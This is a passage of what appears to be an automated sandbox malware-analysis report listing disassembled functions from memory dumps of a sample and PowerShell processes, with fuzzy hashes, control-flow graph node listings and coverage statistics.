                                                                                          • Instruction Fuzzy Hash: 54D06274A011558FD7A49F64E4D8A5DB6B1AB48211F5084AA950AE3259DE304E45CF14
                                                                                          Function 064DBF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 064D86F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 064D8780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a088cbc580c5e5f5f5ada35b7b7b74e8848456ac33ba9538f9cc0d648787d92
                                                                                          • Instruction ID: 715af9f94026653f3453950afd1534ecb3c8092a2f898875ed9ec94bf51dc2d5
                                                                                          • Opcode Fuzzy Hash: 0a088cbc580c5e5f5f5ada35b7b7b74e8848456ac33ba9538f9cc0d648787d92
                                                                                          • Instruction Fuzzy Hash: 67C09B3011410CC7D3157A54E4594EFBB9EE7DDE05F810155D14547745CF357D0187A5
                                                                                          Function 064D1A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a57885193f801b347cf2a4a5ad956fca6bc1c1064d2d8255e7871e88d4653c17
                                                                                          • Instruction ID: 6ff36e9df11272aabf8558195959298710277c58b3cb552dcd0790c3e7077469
                                                                                          • Opcode Fuzzy Hash: a57885193f801b347cf2a4a5ad956fca6bc1c1064d2d8255e7871e88d4653c17
                                                                                          • Instruction Fuzzy Hash: 85C01278A012848FCB241F70A05C71CBAA1AB087A1F800026A84BC335ADB344A028B11
                                                                                          Function 064D8760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 064D76A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 064D87F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 064D7310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c667bb521278104b18c943ef9efe31dd6ad5826e642380b895c8f0fcb63ed074
                                                                                          • Instruction ID: f679e9692c9a2c036325442aa126f078f74f3bc91812e92c83b9092ddb0b58d0
                                                                                          • Opcode Fuzzy Hash: c667bb521278104b18c943ef9efe31dd6ad5826e642380b895c8f0fcb63ed074
                                                                                          • Instruction Fuzzy Hash: 09A02230002B0C8AC30032B02800020B38C8880A08B8000B8830C0CA2328B3E8E08088
                                                                                          Function 064D7680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7e0299ea6bdc9b0128582fc63ad351a367d2c98b30325d989d8db64718610ab
                                                                                          • Instruction ID: ae5d358f149dbc3fc1daac6bf124b5ff2eef25043104c10c77bcb636fdfcb32a
                                                                                          • Opcode Fuzzy Hash: d7e0299ea6bdc9b0128582fc63ad351a367d2c98b30325d989d8db64718610ab
                                                                                          • Instruction Fuzzy Hash: A6A0243001170CC7C3003770700D4147F5CD7041057400074F10C015115F33F010C554
                                                                                          Function 064D7A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c06eb1b024f79769882d94a856fe1cfed8818057e0d1da92f1771290abbad5d2
                                                                                          • Instruction ID: 77145e3c695575d04425e715cb12ea5b89a468c15b2e478414f054db2951b091
                                                                                          • Opcode Fuzzy Hash: c06eb1b024f79769882d94a856fe1cfed8818057e0d1da92f1771290abbad5d2
                                                                                          • Instruction Fuzzy Hash: F090023504464C8B465027997449A5A776CA5455397840051E50D5151A9A5964114695
                                                                                          Function 064D1A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b2568044e6d1beaf2317f6e8277272dc543be1804d93f3e4011726d02036034
                                                                                          • Instruction ID: 33078c73bf9e6c119c925f0dddc70ac1de7b4dee15508cb8d7f7f0bad8f2f65a
                                                                                          • Opcode Fuzzy Hash: 5b2568044e6d1beaf2317f6e8277272dc543be1804d93f3e4011726d02036034
                                                                                          • Instruction Fuzzy Hash: 1AB01234540144AFD3504E10DD5865932219741301F0042515002A21548A301C418B00

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 24279 81d7860 24280 81d78a3 SetThreadToken 24279->24280 24281 81d78d1 24280->24281

                                                                                          Executed Functions

                                                                                          Function 00BBB488 Relevance: .3, Instructions: 256COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 896 bbb488-bbb4b1 898 bbb4b3 896->898 899 bbb4b6-bbb7f1 call bba99c 896->899 898->899 960 bbb7f6-bbb7fd 899->960
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7b76a065933899d8d52ccaf9424c32be1f7432099d97ac103b8024d69216547
                                                                                          • Instruction ID: 853e76718f18e8443b9462809df1d91cc8f996f18a2a14379a9c2ffb3264e9a3
                                                                                          • Opcode Fuzzy Hash: d7b76a065933899d8d52ccaf9424c32be1f7432099d97ac103b8024d69216547
                                                                                          • Instruction Fuzzy Hash: AC91C1B1F007045BDB18EFB589116AEBBF2EF84B00B44896EE106AB354EF745E058BC1
                                                                                          Function 00BBB498 Relevance: .3, Instructions: 252COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 961 bbb498-bbb4b1 962 bbb4b3 961->962 963 bbb4b6-bbb7f1 call bba99c 961->963 962->963 1024 bbb7f6-bbb7fd 963->1024
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0262a849bfe0ed8f553c44ccdd79ed057ccfec75ee307bada68dd98f2604b623
                                                                                          • Instruction ID: 9f6d5ed0638dea32a2afef18277b4673062811a297168e1c832c9b9bc2c7b571
                                                                                          • Opcode Fuzzy Hash: 0262a849bfe0ed8f553c44ccdd79ed057ccfec75ee307bada68dd98f2604b623
                                                                                          • Instruction Fuzzy Hash: E191C1B1F007045BDB19EFB589116AEBBF2EF84B00B44896EE106AB354EF745E058BC1
                                                                                          Function 07242700 Relevance: 22.5, Strings: 17, Instructions: 1223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-141213714
                                                                                          • Opcode ID: 24af4b3fc80d2af0bc7d556c3a90afbf7d8a95ed6569deeb50b1f6d2c7bd7834
                                                                                          • Instruction ID: 1a2a7e811480c5a03eeabfac6a6207eecce36732cc4cebced7c1280753752df7
                                                                                          • Opcode Fuzzy Hash: 24af4b3fc80d2af0bc7d556c3a90afbf7d8a95ed6569deeb50b1f6d2c7bd7834
                                                                                          • Instruction Fuzzy Hash: 8C924DB1B24246CFDB29DB7988017AABFE1BF86314F1480AAE545DB252DF71CC41C7A1
                                                                                          Function 07243CE8 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 369 7243ce8-7243d0d 370 7243f00-7243f1c 369->370 371 7243d13-7243d18 369->371 379 7243ef2-7243efd 370->379 380 7243f1e-7243f4a 370->380 372 7243d30-7243d34 371->372 373 7243d1a-7243d20 371->373 377 7243eb0-7243eba 372->377 378 7243d3a-7243d3c 372->378 375 7243d24-7243d2e 373->375 376 7243d22 373->376 375->372 376->372 381 7243ebc-7243ec5 377->381 382 7243ec8-7243ece 377->382 383 7243d4c 378->383 384 7243d3e-7243d4a 378->384 385 7243f50-7243f55 380->385 386 72440ce-7244112 380->386 387 7243ed4-7243ee0 382->387 388 7243ed0-7243ed2 382->388 390 7243d4e-7243d50 383->390 384->390 392 7243f57-7243f5d 385->392 393 7243f6d-7243f71 385->393 403 7244228-724425d 386->403 404 7244118-724411d 386->404 394 7243ee2-7243ef1 387->394 388->394 390->377 395 7243d56-7243d75 390->395 396 7243f61-7243f6b 392->396 397 7243f5f 392->397 400 7243f77-7243f79 393->400 401 7244080-724408a 393->401 394->379 425 7243d85 395->425 426 7243d77-7243d83 395->426 396->393 397->393 405 7243f89 400->405 406 7243f7b-7243f87 400->406 407 7244097-724409d 401->407 408 724408c-7244094 401->408 427 724425f-7244281 403->427 428 724428b-7244295 403->428 414 7244135-7244139 404->414 415 724411f-7244125 404->415 410 7243f8b-7243f8d 405->410 406->410 411 72440a3-72440af 407->411 412 724409f-72440a1 407->412 410->401 416 7243f93-7243fb2 410->416 417 72440b1-72440cb 411->417 412->417 420 724413f-7244141 414->420 421 72441da-72441e4 414->421 422 7244127 415->422 423 7244129-7244133 415->423 456 7243fb4-7243fc0 416->456 457 7243fc2 416->457 429 7244151 420->429 430 7244143-724414f 420->430 431 72441e6-72441ee 421->431 432 72441f1-72441f7 421->432 422->414 423->414 435 7243d87-7243d89 425->435 426->435 473 72442d5-72442fe 427->473 474 7244283-7244288 427->474 440 7244297-724429c 428->440 441 724429f-72442a5 428->441 436 7244153-7244155 429->436 430->436 438 72441fd-7244209 432->438 439 72441f9-72441fb 432->439 435->377 442 7243d8f-7243d96 435->442 436->421 443 724415b-724415d 436->443 444 724420b-7244225 438->444 439->444 446 72442a7-72442a9 441->446 447 72442ab-72442b7 441->447 442->370 449 7243d9c-7243da1 442->449 450 7244177-724417e 443->450 451 724415f-7244165 443->451 454 72442b9-72442d2 446->454 447->454 458 7243da3-7243da9 449->458 459 7243db9-7243dc8 449->459 462 7244196-72441d7 450->462 463 7244180-7244186 450->463 460 7244167 451->460 461 7244169-7244175 451->461 468 7243fc4-7243fc6 456->468 457->468 469 7243dad-7243db7 458->469 470 7243dab 458->470 459->377 479 7243dce-7243dec 459->479 460->450 461->450 471 7244188 463->471 472 724418a-7244194 463->472 468->401 476 7243fcc-7244003 468->476 469->459 470->459 471->462 472->462 487 7244300-7244326 473->487 488 724432d-724435c 473->488 495 7244005-724400b 476->495 496 724401d-7244024 476->496 479->377 492 7243df2-7243e17 479->492 487->488 497 7244395-724439f 488->497 498 724435e-724437b 488->498 492->377 519 7243e1d-7243e24 492->519 499 724400d 495->499 500 724400f-724401b 495->500 501 7244026-724402c 496->501 502 724403c-724407d 496->502 504 72443a1-72443a5 497->504 505 72443a8-72443ae 497->505 515 72443e5-72443ea 498->515 516 724437d-724438f 498->516 499->496 500->496 507 7244030-724403a 501->507 508 724402e 501->508 511 72443b4-72443c0 505->511 512 72443b0-72443b2 505->512 507->502 508->502 517 72443c2-72443e2 511->517 512->517 515->516 516->497 523 7243e26-7243e41 519->523 524 7243e6a-7243e9d 519->524 528 7243e43-7243e49 523->528 529 7243e5b-7243e5f 523->529 535 7243ea4-7243ead 524->535 531 7243e4d-7243e59 528->531 532 7243e4b 528->532 533 7243e66-7243e68 529->533 531->529 532->529 533->535
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-359900465
                                                                                          • Opcode ID: 4a6ed5e49a81f528b024aa72c747216562934f6a93119ea91e4e84a57da4ab5e
                                                                                          • Instruction ID: f91a4e5216cff5bf8294984f8a017fa5ab70fcb455e0ef7dec300cc6b5cda17b
                                                                                          • Opcode Fuzzy Hash: 4a6ed5e49a81f528b024aa72c747216562934f6a93119ea91e4e84a57da4ab5e
                                                                                          • Instruction Fuzzy Hash: A6123AB1B24246CFDB29EB7884117AABFB29FD1314F1480AAD545DF252DB31DC81CBA1
                                                                                          Function 072417B8 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 540 72417b8-72417da 541 72417e0-72417e5 540->541 542 7241969-72419b5 540->542 543 72417e7-72417ed 541->543 544 72417fd-7241801 541->544 550 7241b04-7241b25 542->550 551 72419bb-72419c0 542->551 546 72417f1-72417fb 543->546 547 72417ef 543->547 548 7241914-724191e 544->548 549 7241807-724180b 544->549 546->544 547->544 552 7241920-7241929 548->552 553 724192c-7241932 548->553 554 724180d-724181e 549->554 555 724184b 549->555 572 7241b27-7241b34 550->572 573 7241b8d 550->573 556 72419c2-72419c8 551->556 557 72419d8-72419dc 551->557 560 7241934-7241936 553->560 561 7241938-7241944 553->561 554->542 578 7241824-7241829 554->578 558 724184d-724184f 555->558 562 72419cc-72419d6 556->562 563 72419ca 556->563 567 7241ab4-7241abe 557->567 568 72419e2-72419e4 557->568 558->548 564 7241855-7241859 558->564 565 7241946-7241966 560->565 561->565 562->557 563->557 564->548 570 724185f-7241863 564->570 576 7241ac0-7241ac9 567->576 577 7241acc-7241ad2 567->577 574 72419f4 568->574 575 72419e6-72419f2 568->575 579 7241865-724186e 570->579 580 7241886 570->580 582 7241b44 572->582 583 7241b36-7241b42 572->583 584 72419f6-72419f8 574->584 575->584 588 7241ad4-7241ad6 577->588 589 7241ad8-7241ae4 577->589 586 7241841-7241849 578->586 587 724182b-7241831 578->587 590 7241875-7241882 579->590 591 7241870-7241873 579->591 593 7241889-7241911 580->593 592 7241b46-7241b48 582->592 583->592 584->567 594 72419fe-7241a16 584->594 586->558 595 7241835-724183f 587->595 596 7241833 587->596 597 7241ae6-7241b01 588->597 589->597 599 7241884 590->599 591->599 600 7241b7c-7241b86 592->600 601 7241b4a-7241b50 592->601 612 7241a30-7241a34 594->612 613 7241a18-7241a1e 594->613 595->586 596->586 599->593 605 7241b90-7241b96 600->605 606 7241b88-7241b8c 600->606 608 7241b52-7241b54 601->608 609 7241b5e-7241b79 601->609 614 7241b9c-7241ba8 605->614 615 7241b98-7241b9a 605->615 606->573 608->609 623 7241a3a-7241a41 612->623 617 7241a20 613->617 618 7241a22-7241a2e 613->618 621 7241baa-7241bc1 614->621 615->621 617->612 618->612 626 7241a43-7241a46 623->626 627 7241a48-7241aa5 623->627 629 7241aaa-7241ab1 626->629 627->629
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: l$l
                                                                                          • API String ID: 0-2387566905
                                                                                          • Opcode ID: 2367ed28765d2bb99e36803bedb08af9f870d533386cfba663bdcb83538e1f28
                                                                                          • Instruction ID: a2911950724c5a12cc5624fc99957c326ef4dd009461ade8e84c4c356a3d02fb
                                                                                          • Opcode Fuzzy Hash: 2367ed28765d2bb99e36803bedb08af9f870d533386cfba663bdcb83538e1f28
                                                                                          • Instruction Fuzzy Hash: 66B138B2B2421ADFCB189F6DC8016AABBE6AFC5210F14C07AD505DB251DB31DDE1C7A1
                                                                                          Function 081D785B Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 638 81d785b-81d789b 639 81d78a3-81d78cf SetThreadToken 638->639 640 81d78d8-81d78f5 639->640 641 81d78d1-81d78d7 639->641 641->640
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2053588343.00000000081D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_81d0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: 44dc13c7d5f59f3d8fc127eb4f075686453305971f11d92272aecdc38faba4ef
                                                                                          • Instruction ID: c6b2def7f64dc94bb219f8e100e7aaf665cea4d1c4acfbd9ed6ca921a6e60bff
                                                                                          • Opcode Fuzzy Hash: 44dc13c7d5f59f3d8fc127eb4f075686453305971f11d92272aecdc38faba4ef
                                                                                          • Instruction Fuzzy Hash: EB1102B59002498FCB10DFAAC585BDEBFF4AF88320F24886AD459A7350C774A944CFA1
                                                                                          Function 081D7860 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 644 81d7860-81d78cf SetThreadToken 646 81d78d8-81d78f5 644->646 647 81d78d1-81d78d7 644->647 647->646
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2053588343.00000000081D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_81d0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: 5045068775fe1bd24c074e21351a0fc746b7938d93e60bd16cf5ac163a5ef72f
                                                                                          • Instruction ID: 9f1706b32a405e24949ec4b7f56d236ad56215cf292160b143678f5d240858d4
                                                                                          • Opcode Fuzzy Hash: 5045068775fe1bd24c074e21351a0fc746b7938d93e60bd16cf5ac163a5ef72f
                                                                                          • Instruction Fuzzy Hash: 9F11F5B59003498FCB10DF9AC985B9EFBF8EF88324F24845AD518A7350D774A944CFA1
                                                                                          Function 00BB6FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 650 bb6fc8-bb6fe7 651 bb70ed-bb712b 650->651 652 bb6fed-bb6ff0 650->652 680 bb6ff2 call bb767f 652->680 681 bb6ff2 call bb7664 652->681 654 bb6ff8-bb700a 655 bb700c 654->655 656 bb7016-bb702b 654->656 655->656 661 bb7031-bb7041 656->661 662 bb70b6-bb70cf 656->662 665 bb704d-bb705b call bbbf18 661->665 666 bb7043 661->666 667 bb70da-bb70db 662->667 668 bb70d1 662->668 672 bb7061-bb7065 665->672 666->665 667->651 668->667 673 bb7067-bb7077 672->673 674 bb70a5-bb70b0 672->674 675 bb7079-bb7091 673->675 676 bb7093-bb709d 673->676 674->661 674->662 675->674 676->674 680->654 681->654
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (jq
                                                                                          • API String ID: 0-3225323518
                                                                                          • Opcode ID: 094009eccfb73cc8660418fd9a856618d64bc7b85b84fb158aebae4eb3d2773b
                                                                                          • Instruction ID: 3467115f8f3b86c95f7f2c545176226a8d5d0ba8d5a3de890f12e5b8db2f6754
                                                                                          • Opcode Fuzzy Hash: 094009eccfb73cc8660418fd9a856618d64bc7b85b84fb158aebae4eb3d2773b
                                                                                          • Instruction Fuzzy Hash: 02414C34B142048FDB04DB68C598AAEBBF2EF8E311F148499E506AB391DE71DD01CB65
                                                                                          Function 00BBAFA0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 682 bbafa0-bbafa9 call bba6a0 684 bbafae-bbafb2 682->684 685 bbafc2-bbb05d 684->685 686 bbafb4-bbafc1 684->686 693 bbb05f-bbb065 685->693 694 bbb066-bbb083 685->694 693->694
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (&fq
                                                                                          • API String ID: 0-1822945044
                                                                                          • Opcode ID: 3ea6b2dddf0cfa82494c9105bf490651c26dcf3c605d9e8d0a4ab71f9dfb91a4
                                                                                          • Instruction ID: ad2d8e76e39b78d17123b4bc1e08bc8b05cf583cce16015143f53a15bd07734d
                                                                                          • Opcode Fuzzy Hash: 3ea6b2dddf0cfa82494c9105bf490651c26dcf3c605d9e8d0a4ab71f9dfb91a4
                                                                                          • Instruction Fuzzy Hash: 9921A171E002598FCB14DFAED444BEFBBF5EB89320F14846AD418E7340DB7499058BA5
                                                                                          Function 00BB29F0 Relevance: .2, Instructions: 210COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
